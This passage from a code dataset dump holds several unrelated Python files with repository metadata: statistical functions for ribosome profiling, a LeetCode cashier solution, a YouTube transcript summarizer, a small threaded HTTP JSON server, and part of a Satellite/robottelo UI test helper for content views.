+ 1 - np.log(th + mu) - (y + th)/(mu + th))))\n \n def info (n, th, mu, y, w):\n return (sum(w * (-polygamma(1, th + y) + polygamma(1, th) - 1/th + 2/(mu + th) - (y + th)/(mu + th)**2)))\n\n try:\n mu = np.mean (y)\n\n weights = np.ones ((len (y)))\n n = np.sum(weights)\n \n t0 = n/sum(weights * (y/mu - 1)**2)\n it = 0\n idel = 1\n \n if (trace): \n print (\"theta.ml: iter\", it, \"theta\", t0)\n \n while (it < limit and abs(idel) > eps):\n \n t0 = abs (t0)\n i = info (n, t0, mu, y, weights)\n idel = score(n, t0, mu, y, weights) / i\n t0 = t0 + idel\n it = it+1\n \n if t0 <= 0 or np.isnan (t0) or np.isinf (t0):\n t0 = 1\n \n if it == limit and trace: \n print (\"iteration limit reached\")\n \n return (t0)\n\n except 
ZeroDivisionError:\n return (1)\n\n \n\n\ndef convert_params(mu, theta):\n \"\"\"\n Convert mean/dispersion parameterization of a negative binomial to the ones scipy supports\n See https://en.wikipedia.org/wiki/Negative_binomial_distribution#Alternative_formulations\n \"\"\"\n r = theta\n var = mu + 1 / r * mu ** 2\n p = (var - mu) / var\n return r, 1 - p\n\n\ndef pmf(counts, mu, theta):\n \"\"\"\n \"\"\"\n return nbinom.pmf(counts, *convert_params(mu, theta))\n\n\n\ndef get_glm (mat, remove_outliers = False):\n \"\"\"\n Fits a negative binomial GLM to the p-sites with a two-class frame feature (on or off-frame) and extracts the parameter for the frame coefficient. \n mat: 2D matrix with shape (ncodons, 3)\n returns: p-value\n \"\"\"\n\n df_glm = pd.DataFrame ({\n 'counts' : mat.reshape (-1),\n 'frame' : ['onframe', 'offframe', 'offframe'] * mat.shape[0]\n })\n\n try:\n\n if remove_outliers:\n\n theta_g = df_glm.groupby (\"frame\").agg ([np.mean, get_theta_ml])\n \n df_glm['pmf'] = pmf (df_glm.counts.values, theta_g.loc[df_glm.frame, ('counts','mean')], theta_g.loc[df_glm.frame, ('counts','get_theta_ml')])\n\n df_glm['adj_pmf'] = p_adjust_bh (df_glm.pmf)\n\n df_glm = df_glm[df_glm.adj_pmf >= 0.01]\n\n\n theta = get_theta_ml (df_glm.counts.values) \n model = smf.glm(formula = \"counts ~ frame\", data=df_glm, family=sm.families.NegativeBinomial(alpha=1/theta)).fit() \n glm_p = model.pvalues[1] # glm_ttest.pvalue\n\n # converting to one-tailed\n if model.params[1] > 0: #== max (model.params):\n glm_p_onetailed = glm_p/2\n else:\n glm_p_onetailed = 1-glm_p/2\n\n return (glm_p_onetailed)\n\n\n except sme.PerfectSeparationError:\n return (np.nan)\n except ValueError: \n return (np.nan)\n except IndexError:\n return (np.nan)\n\n\n\n\n\ndef p_adjust_bh (p):\n \"\"\"\n Benjamini-Hochberg p-value correction for multiple hypothesis testing.\n adapted from here: https://stackoverflow.com/questions/7450957/how-to-implement-rs-p-adjust-in-python to allow NaNs\n \"\"\"\n p = np.asfarray(p)\n \n nna = ~np.isnan (p)\n q = np.empty ((len(p)))\n q[:] = np.nan\n pnna = p[nna]\n\n by_descend = pnna.argsort()[::-1]\n by_orig = by_descend.argsort()\n\n n = len(pnna) #[~np.isnan (p)])\n i = np.arange(len(pnna), 0, -1)\n q[nna] = np.minimum(1, np.fmin.accumulate((float (n)/i) * pnna[by_descend]))[by_orig]\n return q\n \n\n\n\ndef get_filtered_padj (s, pcol=\"p_glm\", name=\"filtered_padj\"):\n \"\"\"\n Adapted from DESeq2; filtering by expression, the BH padjustment if performed solely on ORFs exceeding the expression threshold. \n Then, the threshold that maximized number of rejections (i.e. significant ORFs) are used. 
In contrast to DESeq2, the maximization is\n not based on lowess regression, but simply the cutoff with max rejections (lowess implementation TODO).\n \"\"\"\n \n filter=np.array (s['n'])\n p=np.array(s[pcol])\n nrows = s.shape[0]\n\n if nrows < 50: \n s[name] = p_adjust_bh(p) \n return (s)\n\n lq = np.mean(filter == 0)\n uq = .95 if lq < .95 else 1\n\n r = np.array (np.linspace(start=lq, stop=uq, num=50))\n\n cutoffs = np.quantile (filter, r)\n\n result = np.empty((nrows,len(cutoffs)))\n result[:] = np.nan\n\n for i in range (len (cutoffs)):\n \n use = filter >= cutoffs[i] \n \n if (np.any(use)):\n \n use_p = p[use] \n result[use, i] = p_adjust_bh(use_p) \n\n\n numRej = np.sum (result < 0.05, axis=0)\n j = np.argmax(numRej)\n\n s[name] = result[:,j]\n return (s)\n","repo_name":"ncrnalab/ribofy","sub_path":"ribofy/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":8490,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37218601071","text":"class Cashier:\n def __init__(self, n: int, discount: int, products: 'List[int]', prices: 'List[int]'):\n self.gap = n\n self.cust_cnt = 0 # counter for the customer\n self.discount = discount\n self.prod = {} # the prod-price list\n i = 0\n while i < len(products):\n curr = products[i]\n if curr not in self.prod:\n self.prod[curr] = prices[i]\n i += 1\n\n def getBill(self, product: 'List[int]', amount: 'List[int]') -> float:\n total = 0\n i = 0\n while i < len(product):\n p = product[i]\n curr_charge = self.prod[p] * amount[i]\n total += curr_charge\n i += 1\n self.cust_cnt += 1\n if self.cust_cnt == self.gap:\n self.cust_cnt = 0\n total *= (1 - self.discount / 100)\n return total\n\n# Your Cashier object will be instantiated and called as such:\n# obj = Cashier(n, discount, products, prices)\n# param_1 = obj.getBill(product,amount)","repo_name":"renjieliu/leetcode","sub_path":"1001_1499/1357.py","file_name":"1357.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"73275391734","text":"\n# Import libraries \nfrom youtube_transcript_api import YouTubeTranscriptApi\nfrom youtube_transcript_api.formatters import JSONFormatter\n\nfrom transformers import pipeline\n\nurl = \"https://www.youtube.com/watch?v=Yiaatr-Noh0\"\nvideo_id = url.split(\"=\")[1]\n# print(video_id)\n\n# Must be a single transcript.\ntranscript = YouTubeTranscriptApi.get_transcript(video_id)\n\nformatter = JSONFormatter()\n\n# .format_transcript(transcript) turns the transcript into a JSON string.\njson_formatted = formatter.format_transcript(transcript, indent = 2)\n\n\n# Now we can write it out to a file.\n# Now, a new JSON file that you can easily read back into Python.\n\nwith open('youtube_transcript.json', 'w', encoding='utf-8') as json_file:\n json_file.write(json_formatted)\n\n# text is generated and stored it into r\nresult = \"\"\nfor i in transcript:\n result += ' ' + i['text']\n# print(result)\nprint(len(result))\n\n\n\n# # using pipeline API for summarization task\nsummarization = pipeline(\"summarization\")\n# original_text = result\n\nnum_iters = int(len(result)/1000)\nsummarized_text = []\nfor i in range(0, num_iters + 1):\n start = 0\n start = i * 1000\n end = (i + 1) * 1000\n # print(\"input text \\n\" + result[start:end])\n out = summarization(result[start:end])\n out = out[0]\n out = out['summary_text']\n # print(\"Summarized text\\n\"+out)\n 
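    # Note: the 1000-character windows are character-based, not token-based,
    # so a window can split a sentence (or even a word) mid-way; each window
    # is summarized independently and the pieces are collected below.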
summarized_text.append(out)\n\n#print(summarized_text)\n\n# summary_text = summarization(original_text)[0]['summary_text']\nprint(str(summarized_text))\nprint(len(summarized_text))\n\n\n\n\n\n# from transformers import T5ForConditionalGeneration, T5Tokenizer\n\n# # initialize the model architecture and weights\n# model = T5ForConditionalGeneration.from_pretrained(\"t5-base\")\n# # initialize the model tokenizer\n# tokenizer = T5Tokenizer.from_pretrained(\"t5-base\")\n\n# article = result\n\n# # encode the text into tensor of integers using the appropriate tokenizer\n# inputs = tokenizer.encode(\"summarize: \" + article, return_tensors=\"pt\", max_length=512, truncation=True)\n\n# # generate the summarization output\n# outputs = model.generate(\n# inputs, \n# max_length=250, \n# min_length=40, \n# length_penalty=5.0, \n# num_beams=4, \n# early_stopping=True)\n# # just for debugging\n# print(outputs)\n# print(tokenizer.decode(outputs[0]))\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"ShriyaBijam/Yo-script","sub_path":"transcript.py","file_name":"transcript.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27505398347","text":"#!/usr/bin/env python\n# coding=UTF-8\n\n\nimport socketserver\nfrom http.server import BaseHTTPRequestHandler\nfrom urllib.parse import urlparse\nimport urllib\nimport json\n\n\nclass ThreadedHTTPRequestHandler(BaseHTTPRequestHandler):\n dispatchers = {}\n\n\n def _set_headers(self):\n self.send_response(200)\n self.send_header(\"Access-Control-Allow-Origin\", \"*\")\n self.send_header(\"Access-Control-Request-Method\", \"*\")\n self.end_headers()\n\n def do_HEAD(self):\n self._set_headers()\n\n @classmethod\n def Register(self, path, fun):\n self.dispatchers[path] = fun\n\n def do_GET(self):\n self.log_message(\"in get method\")\n response = {}\n response['status'] = 'error'\n response['msg'] = 'get method is invalid'\n response = json.dumps(response, ensure_ascii=False)\n response = response.encode('utf-8')\n # send data\n self._set_headers()\n self.wfile.write(response)\n\n def do_POST(self):\n self.log_message(\"in post method\")\n data_string = self.rfile.read(int(self.headers['Content-Length']))\n print('post input :', data_string)\n # parse path\n o = urlparse(self.path)\n # parse data\n data_string = data_string.decode('utf-8')\n params = json.loads(data_string)\n # process\n if o.path in self.dispatchers:\n fun = self.dispatchers[o.path]\n response = fun(params)\n else:\n result = 'error url path: {}'.format(data_string)\n response = {}\n response['status'] = 'error'\n response['msg'] = result\n response = json.dumps(response, ensure_ascii=False)\n print('post output :', response)\n response = response.encode('utf-8')\n # send data\n self._set_headers()\n self.wfile.write(response)\n\n\nclass ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):\n pass\n\n\nclass HttpServer:\n\n def __init__(self, host, port):\n self.server = ThreadedTCPServer(\n (host, port), ThreadedHTTPRequestHandler)\n\n def Register(self, path, fun):\n ThreadedHTTPRequestHandler.Register(path, fun)\n\n def Start(self):\n self.server.serve_forever()\n\n def ShutDown(self, *args):\n 
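        # shutdown() deadlocks if called from the thread running
        # serve_forever(); the *args signature suggests this method is also
        # meant to be registered as a (signum, frame) signal handler.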
self.server.shutdown()","repo_name":"zhuwenbo1988/nlp","sub_path":"generative_chitchat/keyword_seq2seq/http_utils/http_server_py3.py","file_name":"http_server_py3.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"38459401236","text":"# -*- encoding: utf-8 -*-\n\"\"\"Implements Content Views UI\"\"\"\n\nimport time\n\nfrom robottelo.constants import FILTER_ERRATA_DATE, FILTER_ERRATA_TYPE\nfrom robottelo.decorators import bz_bug_is_open\nfrom robottelo.ui.base import Base, UIError, UINoSuchElementError\nfrom robottelo.ui.locators import common_locators, locators, tab_locators\nfrom robottelo.ui.navigator import Navigator\n\n\nclass ContentViews(Base):\n \"\"\"Manipulates Content Views from UI\"\"\"\n is_katello = True\n\n def navigate_to_entity(self):\n \"\"\"Navigate to Content Views entity page\"\"\"\n Navigator(self.browser).go_to_content_views()\n\n def _search_locator(self):\n \"\"\"Specify locator for Content Views entity search procedure\"\"\"\n return locators[\"contentviews.key_name\"]\n\n def go_to_filter_page(self, cv_name, filter_name):\n \"\"\"Navigates UI to selected Filter page\"\"\"\n self.search_and_click(cv_name)\n self.click(tab_locators['contentviews.tab_yum_content'])\n self.click(locators['contentviews.content_filters'])\n self.assign_value(\n locators['contentviews.search_filters'], filter_name)\n self.click(common_locators['kt_search_button'])\n self.click(locators['contentviews.select_filter_name'] % filter_name)\n\n def set_calendar_date_value(self, name, value):\n \"\"\"Set the input value of a date field and press the button to hide\n the calendar popup panel\"\"\"\n self.assign_value(\n locators.contentviews.calendar_date_input % name,\n value\n )\n # the calendar panel popup and hide other form elements that became\n # unreachable.\n # close the popup calendar panel\n button = self.wait_until_element(\n locators.contentviews.calendar_date_button % name, timeout=2)\n if button:\n self.click(button)\n\n def create(self, name, label=None, description=None, is_composite=False):\n \"\"\"Creates a content view\"\"\"\n self.click(locators['contentviews.new'])\n self.assign_value(common_locators['name'], name)\n timeout = 60 if len(name) > 50 else 30\n self.wait_for_ajax(timeout)\n if label is not None:\n self.assign_value(common_locators['label'], label)\n if description is not None:\n self.assign_value(common_locators['description'], description)\n if is_composite:\n self.click(locators['contentviews.composite'])\n self.click(common_locators['create'])\n\n def move_affected_components(self, env, cv):\n \"\"\"Move affected components to another environment or content view.\n Activation keys and content hosts are examples of affected components.\n \"\"\"\n self.click(locators['contentviews.change_env'] % env)\n self.select(locators['contentviews.change_cv'], cv)\n self.click(locators['contentviews.next_button'])\n\n def delete_version(self, name, version):\n \"\"\"Deletes published content view's version\"\"\"\n self.search_and_click(name)\n self.click(locators['contentviews.version_dropdown'] % version)\n self.click(locators['contentviews.remove_ver'] % version)\n self.assign_value(\n locators['contentviews.completely_remove_checkbox'], True)\n self.click(locators['contentviews.next_button'])\n self.click(locators['contentviews.confirm_remove_ver'])\n\n def search_filter(self, cv_name, filter_name):\n \"\"\"Uses search box to locate the filters\"\"\"\n 
self.search_and_click(cv_name)\n self.click(tab_locators['contentviews.tab_yum_content'])\n self.click(locators['contentviews.content_filters'])\n self.assign_value(\n locators['contentviews.search_filters'], filter_name)\n self.click(common_locators['kt_search_button'])\n return self.wait_until_element(\n locators['contentviews.filter_name'] % filter_name)\n\n def update(self, name, new_name=None, new_description=None,\n force_puppet=None):\n \"\"\"Updates an existing content view\"\"\"\n self.search_and_click(name)\n self.click(tab_locators['contentviews.tab_details'])\n if new_name:\n self.edit_entity(\n locators['contentviews.edit_name'],\n locators['contentviews.edit_name_text'],\n new_name,\n locators['contentviews.save_name'],\n )\n if new_description:\n self.edit_entity(\n locators['contentviews.edit_description'],\n locators['contentviews.edit_description_text'],\n new_description,\n locators['contentviews.save_description']\n )\n if force_puppet is not None:\n self.edit_entity(\n locators['contentviews.edit_force_puppet'],\n locators['contentviews.edit_force_puppet_checkbox'],\n force_puppet,\n locators['contentviews.save_force_puppet']\n )\n\n def add_remove_repos(\n self, cv_name, repo_names, add_repo=True, repo_type='yum'):\n \"\"\"Add or Remove repository to/from selected content-view.\n\n When 'add_repo' Flag is set then add_repository will be performed,\n otherwise remove_repository\n \"\"\"\n self.search_and_click(cv_name)\n if repo_type == 'yum':\n self.click(tab_locators['contentviews.tab_yum_content'])\n self.click(locators['contentviews.content_repo'])\n elif repo_type == 'docker':\n self.click(tab_locators['contentviews.tab_docker_content'])\n self.click(locators['contentviews.docker_repo'])\n elif repo_type == 'ostree':\n self.click(tab_locators['contentviews.tab_ostree_content'])\n locator = locators['contentviews.select_repo']\n for repo_name in repo_names:\n if add_repo:\n self.click(tab_locators['contentviews.tab_repo_add'])\n else:\n self.click(tab_locators['contentviews.tab_repo_remove'])\n self.assign_value(\n locators['contentviews.repo_search'], repo_name)\n self.click(common_locators['kt_search_button'])\n if not self.wait_until_element(locator % repo_name):\n raise UIError(\n 'Could not find repo \"{0}\" to add into CV'\n .format(repo_name)\n )\n self.click(locator % repo_name)\n if add_repo:\n self.click(locators['contentviews.add_repo'])\n self.click(tab_locators['contentviews.tab_repo_remove'])\n element = self.wait_until_element(locator % repo_name)\n if element is None:\n raise UINoSuchElementError(\n \"Adding repo {0} failed\".format(repo_name))\n else:\n self.click(locators['contentviews.remove_repo'])\n self.click(tab_locators['contentviews.tab_repo_add'])\n element = self.wait_until_element(locator % repo_name)\n if element is None:\n raise UINoSuchElementError(\n \"Removing repo {0} fails\".format(repo_name))\n\n def check_progress_bar_status(self, version):\n \"\"\"Checks the status of progress bar while publishing and promoting the\n CV to next environment\n \"\"\"\n timer = time.time() + 60 * 10\n strategy, value = locators['contentviews.publish_progress']\n check_progress = self.wait_until_element(\n (strategy, value % version),\n timeout=12,\n poll_frequency=2,\n )\n while check_progress and time.time() <= timer:\n check_progress = self.wait_until_element(\n (strategy, value % version),\n timeout=1,\n poll_frequency=0.5,\n )\n\n def publish(self, cv_name, description=None):\n \"\"\"Publishes to create new version of CV and promotes the 
contents to\n 'Library' environment\n \"\"\"\n self.search_and_click(cv_name)\n self.click(locators['contentviews.publish'])\n version_label = self.wait_until_element(\n locators['contentviews.ver_label'])\n version_number = self.wait_until_element(\n locators['contentviews.ver_num'])\n # To fetch the publish version e.g. 'Version 1'\n version = '{0} {1}'.format(version_label.text, version_number.text)\n if description:\n self.assign_value(\n locators['contentviews.publish_description'], description)\n self.click(common_locators['create'])\n self.check_progress_bar_status(version)\n return version\n\n def promote(self, cv_name, version, env):\n \"\"\"Promotes the selected version of content-view to given environment.\n \"\"\"\n self.search_and_click(cv_name)\n self.click(tab_locators['contentviews.tab_versions'])\n self.click(locators['contentviews.promote_button'] % version)\n self.click(locators['contentviews.env_to_promote'] % env)\n self.click(locators['contentviews.promote_version'])\n self.check_progress_bar_status(version)\n return self.wait_until_element(\n locators['contentviews.version_status'] % version).text\n\n def add_puppet_module(self, cv_name, module_name, filter_term):\n \"\"\"Add puppet module to selected view either by its author name or by\n its version.\n\n Filter_term can be used to filter the module by 'author'\n or by 'version'.\n \"\"\"\n self.search_and_click(cv_name)\n if self.wait_until_element(\n tab_locators['contentviews.tab_puppet_modules']):\n self.click(tab_locators['contentviews.tab_puppet_modules'])\n else:\n raise UIError('Could not find tab to add puppet_modules')\n self.click(locators['contentviews.add_module'])\n self.assign_value(\n locators['contentviews.search_filters'], module_name)\n self.click(common_locators['kt_search_button'])\n self.click(locators['contentviews.select_module'] % module_name)\n self.assign_value(\n common_locators['kt_search'], filter_term)\n self.click(locators['contentviews.select_module_ver'] % filter_term)\n\n def add_remove_cv(self, composite_cv, cv_names, is_add=True):\n \"\"\"Add or Remove content-views to/from selected composite view.\n When 'is_add' Flag is set then add_contentView will be performed,\n otherwise remove_contentView\n \"\"\"\n self.search_and_click(composite_cv)\n if self.wait_until_element(\n tab_locators['contentviews.tab_content_views']):\n self.click(tab_locators['contentviews.tab_content_views'])\n else:\n raise UINoSuchElementError(\n 'Could not find ContentView tab, please make sure '\n 'selected view is composite'\n )\n for cv_name in cv_names:\n if is_add:\n self.click(tab_locators['contentviews.tab_cv_add'])\n else:\n self.click(tab_locators['contentviews.tab_cv_remove'])\n locator = locators['contentviews.select_cv']\n self.click(locator % cv_name)\n if is_add:\n self.click(locators['contentviews.add_cv'])\n self.click(tab_locators['contentviews.tab_cv_remove'])\n element = self.wait_until_element(locator % cv_name)\n if element is None:\n raise UINoSuchElementError(\n \"Adding CV {0} failed\".format(cv_name))\n else:\n self.click(locators['contentviews.remove_cv'])\n self.click(tab_locators['contentviews.tab_cv_add'])\n element = self.wait_until_element(locator % cv_name)\n if element is None:\n raise UINoSuchElementError(\n \"Removing CV {0} fails\".format(cv_name))\n\n def add_filter(self, cv_name, filter_name,\n content_type, filter_type, description=None):\n \"\"\"Creates content-view filter of given 'type'(include/exclude) and\n 'content-type'(package/package-group/errata)\n \"\"\"\n 
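        # Illustrative call with hypothetical names, selecting a module by
        # its author rather than by a version string:
        #     add_puppet_module('my_cv', 'stdlib', filter_term='puppetlabs')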
self.search_and_click(cv_name)\n self.click(tab_locators['contentviews.tab_yum_content'])\n self.click(locators['contentviews.content_filters'])\n self.click(locators['contentviews.new_filter'])\n self.assign_value(common_locators['name'], filter_name)\n if content_type:\n self.select(locators['contentviews.content_type'], content_type)\n else:\n raise UIError(\n 'Could not create filter without content type'\n )\n if filter_type:\n self.select(locators['contentviews.type'], filter_type)\n else:\n raise UIError(\n 'Could not create filter without specifying filter '\n 'type'\n )\n if description:\n self.assign_value(common_locators['description'], description)\n self.click(common_locators['create'])\n\n def remove_filter(self, cv_name, filter_names):\n \"\"\"Removes selected filter from selected content-view.\"\"\"\n self.search_and_click(cv_name)\n self.click(tab_locators['contentviews.tab_yum_content'])\n self.click(locators['contentviews.content_filters'])\n\n # Workaround to remove previously used search string\n # from search box\n self.find_element(locators['contentviews.search_filters']).clear()\n self.click(common_locators['kt_search_button'])\n for filter_name in filter_names:\n self.click(\n locators['contentviews.select_filter_checkbox'] % filter_name)\n self.click(locators['contentviews.remove_filter'])\n\n def select_package_version_value(\n self, version_type, value1=None, value2=None):\n \"\"\"Select package version and set values: versions are: 'All' 'Equal\n To' 'Greater Than' 'Less Than' 'Range'.\n\n 'value1' should contain version value for types: 'Equal To' 'Greater\n Than' 'Less Than'.\n\n 'value2' should only be used with type 'Range' to define range of\n versions.\n \"\"\"\n if version_type == 'Equal To':\n self.assign_value(\n locators['contentviews.equal_value'], value1)\n elif version_type == 'Greater Than':\n self.assign_value(\n locators['contentviews.greater_min_value'], value1)\n elif version_type == 'Less Than':\n self.assign_value(\n locators['contentviews.less_max_value'], value1)\n elif version_type == 'Range':\n self.assign_value(\n locators['contentviews.greater_min_value'], value1)\n self.assign_value(\n locators['contentviews.less_max_value'], value2)\n else:\n raise UIError('Could not find valid version type')\n\n def add_packages_to_filter(self, cv_name, filter_name, package_names,\n version_types, values=None, max_values=None):\n \"\"\"Adds packages to selected filter for inclusion/Exclusion\"\"\"\n self.go_to_filter_page(cv_name, filter_name)\n for package_name, version_type, value, max_value in zip(\n package_names, version_types, values, max_values):\n self.click(locators['contentviews.add_rule'])\n self.assign_value(\n locators['contentviews.input_pkg_name'], package_name)\n self.select(\n locators['contentviews.select_pkg_version'], version_type)\n if not version_type == 'All Versions':\n self.select_package_version_value(\n version_type, value, max_value)\n self.click(locators['contentviews.add_pkg_button'])\n\n def remove_packages_from_filter(self, cv_name, filter_name, package_names):\n \"\"\"Removes selected packages from selected package type filter.\"\"\"\n self.go_to_filter_page(cv_name, filter_name)\n # On UI there's no attribute or text containing package name, just\n # disabled input with value set to package name after page loading (so\n # there's no @value attribute). 
This makes impossible to form xpath for\n # specific package and the only remaining option is to locate all the\n # packages and select only the one whose input contains desired value\n packages = self.find_elements(locators['contentviews.packages'])\n checkboxes = [\n package.find_element(*locators['contentviews.package_checkbox'])\n for package in packages\n if package.get_attribute('value') in package_names\n ]\n for checkbox in checkboxes:\n self.click(checkbox)\n self.click(locators['contentviews.remove_packages'])\n\n def update_package_filter(self, cv_name, filter_name, package_name,\n version_type=None, version_value=None,\n new_package_name=None, new_version_type=None,\n new_version_value=None):\n \"\"\"Update package in a filter\"\"\"\n version_types = {\n 'Equal To': 'equal',\n 'Greater Than': 'greater',\n 'Less Than': 'less',\n 'Range': 'range',\n 'All Versions': 'all',\n }\n self.go_to_filter_page(cv_name, filter_name)\n # As it's impossible to obtain specific filter directly,\n # getting all the package filters first\n packages = self.find_elements(locators['contentviews.packages'])\n # Then selecting the filters with the same package as passed\n packages = [\n package for package in packages\n if package.get_attribute('value') == package_name\n ]\n # As there can be multiple filters for the same package, user may want\n # to specify version type and version of package filter\n # If version type was passed - filter package list by version type\n if version_type:\n packages = [\n package for package in packages\n if package.find_element(\n *locators['contentviews.package_version_type']\n ).get_attribute('value') == version_types[version_type]\n ]\n # If version was passed - filter package list by version\n if version_value:\n packages = [\n package for package in packages\n if package.find_element(\n *locators['contentviews.package_version_value']\n ).get_attribute('value') == version_value\n ]\n # What's left in package list is probably our package, let's work with\n # it\n if packages:\n package = packages[0]\n # But if package list is empty - notify user he specified something\n # wrong\n else:\n raise UINoSuchElementError('Package filter not found')\n # Now just usual stuff - clicking 'edit' button, updating corresponding\n # fields and clicking 'save' button\n self.click(\n package.find_element(*locators['contentviews.package_edit']))\n if new_package_name:\n self.assign_value(package, new_package_name)\n if new_version_type:\n self.assign_value(\n package.find_element(\n *locators['contentviews.package_version_type']),\n new_version_type\n )\n if new_version_value:\n self.assign_value(\n package.find_element(\n *locators['contentviews.package_version_value']),\n new_version_value\n )\n self.click(\n package.find_element(*locators['contentviews.package_save']))\n\n def update_filter_affected_repos(self, cv_name, filter_name,\n new_affected_repos):\n \"\"\"Update affected repos of content view filter\"\"\"\n self.go_to_filter_page(cv_name, filter_name)\n self.click(tab_locators['contentviews.tab_filter_affected_repos'])\n self.assign_value(\n locators['contentviews.affected_repos_radio'], True)\n all_repo_checkboxes = self.find_elements(\n locators['contentviews.affected_repos_checkboxes'])\n # Uncheck all the repos first\n for checkbox in all_repo_checkboxes:\n self.assign_value(checkbox, False)\n # Check off passed repos\n for repo_name in new_affected_repos:\n self.assign_value(\n locators['contentviews.affected_repo_checkbox'] % repo_name,\n True\n )\n 
self.click(locators['contentviews.filter_update_repos'])\n\n def add_remove_package_groups_to_filter(self, cv_name, filter_name,\n package_groups, is_add=True):\n \"\"\"Add/Remove package groups to/from selected filter for\n inclusion/Exclusion.\n \"\"\"\n self.go_to_filter_page(cv_name, filter_name)\n if is_add:\n self.click(tab_locators['contentviews.tab_pkg_group_add'])\n else:\n self.click(tab_locators['contentviews.tab_pkg_group_remove'])\n for package_group in package_groups:\n self.click(\n locators['contentviews.select_pkg_group_checkbox']\n % package_group\n )\n if is_add:\n self.click(locators['contentviews.add_pkg_group'])\n else:\n self.click(locators['contentviews.remove_pkg_group'])\n\n def add_remove_errata_to_filter(self, cv_name, filter_name,\n errata_ids=None, select_all=None,\n is_add=True):\n \"\"\"Add/Remove errata to/from selected filter for inclusion/exclusion\n\n :param str cv_name: Name of content view\n :param str filter_name: Name of content view filter\n :param list optional errata_ids: list of specific errata ids to add or\n remove\n :param bool optional select_all: whether to check off 'Select All'\n checkbox to select all available errata\n :param bool is_add: `True` for adding and `False` for removing errata\n to/from filter\n \"\"\"\n self.go_to_filter_page(cv_name, filter_name)\n if is_add:\n self.click(tab_locators['contentviews.tab_add'])\n else:\n self.click(tab_locators['contentviews.tab_remove'])\n if errata_ids is not None:\n for errata_id in errata_ids:\n self.click(\n locators.contentviews.select_errata_checkbox % errata_id)\n if select_all is not None:\n self.assign_value(\n common_locators.table_select_all_checkbox, select_all)\n if is_add:\n self.click(locators['contentviews.add_errata'])\n else:\n self.click(locators['contentviews.remove_errata'])\n\n def edit_erratum_date_range_filter(\n self, cv_name, filter_name, errata_types=None, date_type=None,\n start_date=None, end_date=None, open_filter=True):\n \"\"\"Edit Erratum Date Range Filter\"\"\"\n allowed_errata_types = FILTER_ERRATA_TYPE.values()\n allowed_date_types = FILTER_ERRATA_DATE.values()\n if open_filter:\n self.go_to_filter_page(cv_name, filter_name)\n if errata_types is not None:\n if not errata_types:\n raise UIError(\n 'errata types is empty, minimum required: one errata type'\n )\n if not set(errata_types).issubset(allowed_errata_types):\n raise UIError('some types in errata_types are not allowed')\n # because of the behaviour of the UI to disable the last checked\n # element.\n # will check all selected errata types first, after then uncheck\n # the not selected ones.\n # 1 - check first the types that are in the errata_types\n for errata_type in errata_types:\n self.assign_value(\n locators.contentviews.erratum_type_checkbox % errata_type,\n True\n )\n # we are sure now that any check box not in the errata_types\n # is enabled and clickable\n # 2 - uncheck the types that are not in the selection\n for errata_type in set(allowed_errata_types).difference(\n errata_types):\n self.assign_value(\n locators.contentviews.erratum_type_checkbox % errata_type,\n False\n )\n if date_type is not None:\n if date_type not in allowed_date_types:\n raise UIError('date type \"{0}\" not allowed'.format(date_type))\n self.click(locators.contentviews.erratum_date_type % date_type)\n if start_date is not None:\n self.set_calendar_date_value('start_date', start_date)\n if end_date is not None:\n self.set_calendar_date_value('end_date', end_date)\n self.click(locators.contentviews.save_erratum)\n\n 
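    # Illustrative call with hypothetical names (the 'security' type and the
    # 'issued' date key are assumptions about robottelo's constants): keep
    # only security errata issued during 2016.
    #
    #     edit_erratum_date_range_filter(
    #         'my_cv', 'my_filter',
    #         errata_types=['security'],
    #         date_type=FILTER_ERRATA_DATE['issued'],
    #         start_date='2016-01-01', end_date='2016-12-31',
    #     )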
def edit_erratum_id_filter(\n self, cv_name, filter_name, errata_types=None, open_filter=True):\n \"\"\"Edit Erratum by ID Filter\"\"\"\n allowed_errata_types = FILTER_ERRATA_TYPE.values()\n if open_filter:\n self.go_to_filter_page(cv_name, filter_name)\n self.click(tab_locators.contentviews.tab_add)\n if errata_types is not None:\n if not errata_types:\n raise UIError(\n 'errata types is empty, minimum required: one errata type'\n )\n if not set(errata_types).issubset(allowed_errata_types):\n raise UIError('some types in errata_types are not allowed')\n # because of the behaviour of the UI to disable the last checked\n # element.\n # will check all selected errata types first, after then uncheck\n # the not selected ones.\n # 1 - check first the types that are in the errata_types\n for errata_type in errata_types:\n self.assign_value(\n locators.contentviews.erratum_type_checkbox % errata_type,\n True\n )\n # we are sure now that any check box not in the errata_types\n # is enabled and clickable\n # 2 - uncheck the types that are not in the selection\n for errata_type in set(allowed_errata_types).difference(\n errata_types):\n self.assign_value(\n locators.contentviews.erratum_type_checkbox % errata_type,\n False\n )\n\n def fetch_erratum_date_range_filter_values(self, cv_name, filter_name):\n \"\"\"Fetch Content View Erratum Date Range Filter values\"\"\"\n self.go_to_filter_page(cv_name, filter_name)\n result = {\n 'date_type': None,\n 'end_date': None,\n 'start_date': None,\n 'types': [],\n }\n for errata_type in FILTER_ERRATA_TYPE.values():\n if self.wait_until_element(\n locators['contentviews.erratum_type_checkbox'] % errata_type\n ).is_selected():\n result['types'].append(errata_type)\n for date_type in FILTER_ERRATA_DATE.values():\n if self.wait_until_element(\n locators['contentviews.erratum_date_type'] % date_type\n ).is_selected():\n result['date_type'] = date_type\n break\n result['start_date'] = self.wait_until_element(\n locators['contentviews.calendar_date_input'] % 'start_date'\n ).get_attribute('value')\n result['end_date'] = self.wait_until_element(\n locators['contentviews.calendar_date_input'] % 'end_date'\n ).get_attribute('value')\n return result\n\n def fetch_puppet_module(self, cv_name, module_name):\n \"\"\"Get added puppet module name from selected content-view\"\"\"\n self.search_and_click(cv_name)\n self.click(tab_locators['contentviews.tab_puppet_modules'])\n self.assign_value(common_locators['kt_search'], module_name)\n self.click(common_locators['kt_search_button'])\n return self.wait_until_element(\n locators['contentviews.get_module_name'] % module_name)\n\n def copy_view(self, name, new_name):\n \"\"\"Copies an existing Content View.\"\"\"\n 